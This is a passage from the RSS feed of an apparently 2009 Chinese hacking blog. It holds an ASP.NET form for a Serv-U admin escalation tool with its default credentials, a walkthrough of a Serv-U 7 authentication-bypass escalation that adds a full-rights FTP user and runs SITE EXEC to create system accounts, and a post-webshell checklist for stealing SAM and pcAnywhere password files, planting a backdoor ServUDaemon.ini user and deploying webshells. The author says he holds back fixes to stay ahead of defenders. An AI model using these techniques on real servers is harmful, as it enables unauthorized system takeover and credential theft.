            &lt;asp:Label id=&#8221;Label1&#8243; runat=&#8221;server&#8221; width=&#8221;353px&#8221; forecolor=&#8221;Blue&#8221;&gt;from Serv-U 2<br />
            admin by lake2&lt;/asp:Label&gt;<br />
        &lt;/p&gt;<br />
        &lt;p&gt;<br />
            &lt;asp:Label id=&#8221;Label2&#8243; runat=&#8221;server&#8221; width=&#8221;40px&#8221;&gt;Name&lt;/asp:Label&gt;<br />
            &lt;asp:TextBox id=&#8221;Text_Name&#8221; runat=&#8221;server&#8221; Width=&#8221;152px&#8221;&gt;LocalAdministrator&lt;/asp:TextBox&gt;<br />
            &lt;br /&gt;<br />
            &lt;asp:Label id=&#8221;Label3&#8243; runat=&#8221;server&#8221; width=&#8221;40px&#8221;&gt;PWD&lt;/asp:Label&gt;<br />
            &lt;asp:TextBox id=&#8221;Text_PWD&#8221; runat=&#8221;server&#8221;&gt;#l@$ak#.lk;0@P&lt;/asp:TextBox&gt;<br />
            &lt;br /&gt;<br />
            &lt;asp:Label id=&#8221;Label4&#8243; runat=&#8221;server&#8221; width=&#8221;40px&#8221;&gt;Port&lt;/asp:Label&gt;<br />
            &lt;asp:TextBox id=&#8221;Text_Port&#8221; runat=&#8221;server&#8221;&gt;43958&lt;/asp:TextBox&gt;<br />
            &lt;br /&gt;<br />
            &lt;asp:Label id=&#8221;Label5&#8243; runat=&#8221;server&#8221; width=&#8221;40px&#8221;&gt;cmd&lt;/asp:Label&gt;<br />
            &lt;asp:TextBox id=&#8221;Text_cmd&#8221; runat=&#8221;server&#8221;&gt;&lt;/asp:TextBox&gt;<br />
        &lt;/p&gt;<br />
        &lt;p&gt;<br />
            &lt;asp:Button id=&#8221;BTN_Start&#8221; onclick=&#8221;BTN_Start_Click&#8221; runat=&#8221;server&#8221; Text=&#8221;Start&#8221;&gt;&lt;/asp:Button&gt;<br />
        &lt;/p&gt;<br />
        &lt;p&gt;<br />
            &lt;hr /&gt;<br />
            &lt;!&#8211; Insert content here &#8211;&gt;<br />
        &lt;/p&gt;<br />
    &lt;/form&gt;<br />
&lt;/body&gt;<br />
&lt;/html&gt;</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=774&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_774" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/net-serv-u.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MSSQLCracker in ASP提权方法</title>
		<link>http://www.p9.net.cn/sec/mssqlcracker-in-asp-ways-to-mention-the-right-to.html</link>
		<comments>http://www.p9.net.cn/sec/mssqlcracker-in-asp-ways-to-mention-the-right-to.html#comments</comments>
		<pubDate>Sun, 08 Mar 2009 02:25:21 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=715</guid>
		<description><![CDATA[收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[收藏、分享这篇文章!
]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/mssqlcracker-in-asp-ways-to-mention-the-right-to.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>serv-u7 php版提权工具使用方法</title>
		<link>http://www.p9.net.cn/sec/serv-u7-php-version-to-use-the-right-instrument.html</link>
		<comments>http://www.p9.net.cn/sec/serv-u7-php-version-to-use-the-right-instrument.html#comments</comments>
		<pubDate>Fri, 06 Mar 2009 06:43:45 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=684</guid>
		<description><![CDATA[一，su7是提权有几种方式？
有两种形式去干掉su7。
1&#62;，登陆管理员控制台的页面
==&#62;获取OrganizationId，用于添加用户
==&#62;获取全局用户的“下一个新用户ID”
==&#62;添加用户
==&#62;添加用户的权限 or 添加全局用户权限
==&#62;用户登陆
==&#62;执行系统命令添加系统账户。
2&#62;，登陆管理员控制台页面
==&#62;基本WEB客户端
==&#62;来到serv-u的目录下&#8211;users&#8211;Global user目录
==&#62;上传一个你已经定义好的用户文件
==&#62;用户登陆
==&#62;执行系统命令添加系统账户
而本文件使用了第一种方法。
二，提权的原理？
Su7的管理平台是http的，很先进。
抓包，分析，发现了以下路程是可以利用的。
1，    管理员从管理控制台打开web页面时，是不需要验证密码的。
2，    管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&#38;Language=zh,CN&#38;LocalAdmin=1”
3，    管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。
4，    管理员添加了用户的这个包和设置权限这个包，是分开的。
所以，我可以抓包然后转换成php的socket连接post出去。
最后在用经典的ftp登陆，exec命令。达到提权。
在写php的过程中，遇到很多问题，比如函数不会用等等（—_—!以前没学过php），感谢“云舒牛”帮忙。。。
在分析包的流程，发现了一些特征，服务器返回的数据，全是以xml格式发来的。而在数据传输的过程中，设计的很经典。
Su7也有自己的数据库，他也会自己生成一个id。
这个ID是随机的，在你创建用户时，会先请求服务器生成一个，生成好后，修改该id的用户名，密码等。
这很像oracle的insert手段。
写工具的过程中，遇到很多麻烦，最大的麻烦就是这个ID问题，后来分析出来了。
添加权限时，也是可以利用这个ID的。
于是工具一共连接了6次服务器，这几次分别是：
1，    用来登陆平台，使用那个输入任何密码都可以登陆的页面地址。返回一个sessionid，这个sessionid在以后的包都用到了。
2，    获取OrganizationId，用于添加用户
3，    用来请求一个用户ID。
4，    修改该ID的登陆用户名，密码。
5，    修改该ID的权限，加c盘的写删执行等。
6，    这次连接是做坏事的，使用前面添加的用户执行系统命令。
三，为啥我明明显示成功了，但是却提不上去？
这要看错误代码了，这里偶很惭愧，并没有写详细的错误代码判断。
一般有以下几种情况：
1，可能是因为管理员密码不对。
参照管理员密码的连接。
2，可能是因为管理员限制了执行SITE EXEC。
有待程序修改，程序可以加一个让他不限制的功能。
3，可能是程序问题。
4，为啥作者有这么多理由不去改？
你没发现么？一旦把东西做完美了，那比较系统的防御方案就出来了。
如果不完美，让他以为我们就这点手段，防御系统也会这么认为。
不信的话，过段时间，防御方案出来了，肯定有一条：“修改site exec为不可访问”。
到时候，我再写个功能，把这玩意改回来就是。
所以，等大家都提倡要XXXX的时候，我再解决XXXX的问题。大家先这么玩着吧:)
四，关于管理员密码
默认为空，如果密码为空，填什么都能进去。
如果修改过，管理员密码默认会在这里：
C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive
文件中找到一个MD5密码值。
C:\Program Files\RhinoSoft.com\Serv-U
是su的根目录。
密码值的样式为(假设是123456)
kx#######################
#代表123456的32位MD5加密，而kx则是su对md5的密码算法改进的随机2位字符。
破解后的密码为kx123456，去掉kx就是密码了。
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.p9.net.cn/tag/提权"><img class="alignright size-full wp-image-639" title="tiquan" src="http://www.p9.net.cn/wp-content/uploads/2009/03/tiquan.png" alt="tiquan" width="90" height="100" /></a>一，su7是提权有几种方式？<br />
有两种形式去干掉su7。<br />
1&gt;，登陆管理员控制台的页面<br />
==&gt;获取OrganizationId，用于添加用户<br />
==&gt;获取全局用户的“下一个新用户ID”<br />
==&gt;添加用户<br />
==&gt;添加用户的权限 or 添加全局用户权限<br />
==&gt;用户登陆<br />
==&gt;执行系统命令添加系统账户。<span id="more-684"></span><br />
2&gt;，登陆管理员控制台页面<br />
==&gt;基本WEB客户端<br />
==&gt;来到serv-u的目录下&#8211;users&#8211;Global user目录<br />
==&gt;上传一个你已经定义好的用户文件<br />
==&gt;用户登陆<br />
==&gt;执行系统命令添加系统账户<br />
而本文件使用了第一种方法。</p>
<p>二，提权的原理？<br />
Su7的管理平台是http的，很先进。<br />
抓包，分析，发现了以下路程是可以利用的。<br />
1，    管理员从管理控制台打开web页面时，是不需要验证密码的。<br />
2，    管理员如果用某URL打开web页面时，虽然需要输入密码，但是无论输入什么，都可以进入。“/?Session=39893&amp;Language=zh,CN&amp;LocalAdmin=1”<br />
3，    管理员可以添加用户有两种，一种是全局用户，一种是某个域下的用户。而权限设置也是两种，一种是全局，一种是针对用户。<br />
4，    管理员添加了用户的这个包和设置权限这个包，是分开的。<br />
所以，我可以抓包然后转换成php的socket连接post出去。<br />
最后在用经典的ftp登陆，exec命令。达到提权。<br />
在写php的过程中，遇到很多问题，比如函数不会用等等（—_—!以前没学过php），感谢“云舒牛”帮忙。。。<br />
在分析包的流程，发现了一些特征，服务器返回的数据，全是以xml格式发来的。而在数据传输的过程中，设计的很经典。<br />
Su7也有自己的数据库，他也会自己生成一个id。<br />
这个ID是随机的，在你创建用户时，会先请求服务器生成一个，生成好后，修改该id的用户名，密码等。<br />
这很像oracle的insert手段。</p>
<p>写工具的过程中，遇到很多麻烦，最大的麻烦就是这个ID问题，后来分析出来了。<br />
添加权限时，也是可以利用这个ID的。<br />
于是工具一共连接了6次服务器，这几次分别是：<br />
1，    用来登陆平台，使用那个输入任何密码都可以登陆的页面地址。返回一个sessionid，这个sessionid在以后的包都用到了。<br />
2，    获取OrganizationId，用于添加用户<br />
3，    用来请求一个用户ID。<br />
4，    修改该ID的登陆用户名，密码。<br />
5，    修改该ID的权限，加c盘的写删执行等。<br />
6，    这次连接是做坏事的，使用前面添加的用户执行系统命令。</p>
<p>三，为啥我明明显示成功了，但是却提不上去？<br />
这要看错误代码了，这里偶很惭愧，并没有写详细的错误代码判断。<br />
一般有以下几种情况：<br />
1，可能是因为管理员密码不对。<br />
参照管理员密码的连接。<br />
2，可能是因为管理员限制了执行SITE EXEC。<br />
有待程序修改，程序可以加一个让他不限制的功能。<br />
3，可能是程序问题。<br />
4，为啥作者有这么多理由不去改？<br />
你没发现么？一旦把东西做完美了，那比较系统的防御方案就出来了。<br />
如果不完美，让他以为我们就这点手段，防御系统也会这么认为。<br />
不信的话，过段时间，防御方案出来了，肯定有一条：“修改site exec为不可访问”。<br />
到时候，我再写个功能，把这玩意改回来就是。<br />
所以，等大家都提倡要XXXX的时候，我再解决XXXX的问题。大家先这么玩着吧:)</p>
<p>四，关于管理员密码</p>
<p>默认为空，如果密码为空，填什么都能进去。<br />
如果修改过，管理员密码默认会在这里：<br />
C:\Program Files\RhinoSoft.com\Serv-U\Users\Local Administrator Domain\.Archive<br />
文件中找到一个MD5密码值。<br />
C:\Program Files\RhinoSoft.com\Serv-U<br />
是su的根目录。<br />
密码值的样式为(假设是123456)<br />
kx#######################<br />
#代表123456的32位MD5加密，而kx则是su对md5的密码算法改进的随机2位字符。<br />
破解后的密码为kx123456，去掉kx就是密码了。</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=684&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_684" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/serv-u7-php-version-to-use-the-right-instrument.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>许多高手提升权限技巧</title>
		<link>http://www.p9.net.cn/sec/permission-to-upgrade-the-skills-of-many-masters.html</link>
		<comments>http://www.p9.net.cn/sec/permission-to-upgrade-the-skills-of-many-masters.html#comments</comments>
		<pubDate>Fri, 06 Mar 2009 01:20:58 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network security crack]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[黑客]]></category>

		<guid isPermaLink="false">http://www.p9.net.cn/?p=638</guid>
		<description><![CDATA[当我们取得一个webshell时候，下一部要做的就是提升权限
　　个人总结如下：
　　1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密码，登陆
　　2.C:\WINNT\system32\config进这里下它的SAM，破解用户的密码
　　c:\winnt\repaire 下是备份
　　用到破解sam密码的软件有LC，SAMinside
　　3.C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能跳转不，我们从这里可以获取好多有用的信息
　　可以看见好多快捷方式，我们一般选择Serv-U的，然后本地查看属性，知道路径后，看能否跳转
　　进去后，如果有权限修改ServUDaemon.ini，加个用户上去，密码为空
　　[USER=dede&#124;1]
　　Password=
　　HomeDir=c:TimeOut=600
　　Maintenance=System
　　Access1=C:\&#124;RWAMELCDP
　　Access1=d:\&#124;RWAMELCDP
　　Access1=f:\&#124;RWAMELCDP
　　SKEYValues=
　　这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限
　　4.c:\winnt\system32\inetsrv\data就是这个目录，同样是erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去，然后执行
　　5.看能否跳转到如下目录
　　c:\php, 用phpspy
　　c:\prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell
　　#!/usr/bin/perl
　　binmode(STDOUT);
　　syswrite(STDOUT, &#8220;Content-type: text/html\r\n\r\n&#8221;, 27);
收藏、分享这篇文章!
]]></description>
			<content:encoded><![CDATA[<p><a href="http://www.p9.net.cn/sec"><img class="alignright size-full wp-image-639" title="tiquan" src="http://www.p9.net.cn/wp-content/uploads/2009/03/tiquan.png" alt="tiquan" width="90" height="100" /></a>当我们取得一个webshell时候，下一部要做的就是提升权限</p>
<p>　　个人总结如下：</p>
<p>　　1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，得到pcAnywhere密码，登陆<span id="more-638"></span></p>
<p>　　2.C:\WINNT\system32\config进这里下它的SAM，破解用户的密码</p>
<p>　　c:\winnt\repaire 下是备份</p>
<p>　　用到破解sam密码的软件有LC，SAMinside</p>
<p>　　3.C:\Documents and Settings\All Users\「开始」菜单\程序 看这里能跳转不，我们从这里可以获取好多有用的信息</p>
<p>　　可以看见好多快捷方式，我们一般选择Serv-U的，然后本地查看属性，知道路径后，看能否跳转</p>
<p>　　进去后，如果有权限修改ServUDaemon.ini，加个用户上去，密码为空</p>
<p>　　[USER=dede|1]</p>
<p>　　Password=</p>
<p>　　HomeDir=c:TimeOut=600</p>
<p>　　Maintenance=System</p>
<p>　　Access1=C:\|RWAMELCDP</p>
<p>　　Access1=d:\|RWAMELCDP</p>
<p>　　Access1=f:\|RWAMELCDP</p>
<p>　　SKEYValues=</p>
<p>　　这个用户具有最高权限，然后我们就可以ftp上去 quote site exec xxx 来提升权限</p>
<p>　　4.c:\winnt\system32\inetsrv\data就是这个目录，同样是erveryone 完全控制，我们所要做的就是把提升权限的工具上传上去，然后执行</p>
<p>　　5.看能否跳转到如下目录</p>
<p>　　c:\php, 用phpspy</p>
<p>　　c:\prel，有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell</p>
<p>　　#!/usr/bin/perl</p>
<p>　　binmode(STDOUT);</p>
<p>　　syswrite(STDOUT, &#8220;Content-type: text/html\r\n\r\n&#8221;, 27);</p>
<p class="akst_link"><a href="http://www.p9.net.cn/?p=638&amp;akst_action=share-this"  title="可以通过E-mail分享, 用del.icio.us、Google等网络书签收藏！" id="akst_link_638" class="akst_share_link" rel="nofollow">收藏、分享这篇文章!</a>
</p>]]></content:encoded>
			<wfw:commentRss>http://www.p9.net.cn/sec/permission-to-upgrade-the-skills-of-many-masters.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

